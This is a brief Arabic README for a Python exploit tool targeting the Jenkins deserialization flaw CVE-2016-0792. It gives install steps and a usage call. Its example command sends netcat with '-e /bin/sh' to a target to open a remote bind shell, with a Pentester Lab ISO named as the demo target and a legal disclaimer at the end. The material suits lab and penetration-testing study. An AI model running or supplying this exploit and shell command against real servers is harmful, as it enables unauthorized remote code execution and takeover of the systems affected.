
استغلال لثغرة التسلسل في Jenkins - CVE-2016-0792
https://www.exploit-db.com/exploits/42394/
Python 3.6.x
مكتبة requests مطلوبة لكي يعمل هذا الاستغلال
sudo pip install requests
python3
from exploit import exploit
exploit(url, command)
حيث يكون url هو عنوان خادم Jenkins و command هو الأمر المطلوب تنفيذه
exploit('http://192.168.56.101/jenkins/', '/usr/bin/nc -l -p 9999 -e /bin/sh')
سيؤدي هذا إلى تشغيل nc والاستماع على المنفذ 9999 على الجهاز المعرّض للثغرة
لأغراض العرض التوضيحي، سأقوم بتشغيل ISO من Pentester Lab
استخدام هذا البرنامج لمهاجمة الأهداف دون إذن غير قانوني. لست مسؤولاً عن أي ضرر ناتج عن استخدام هذا البرنامج بشكل يخالف القانون.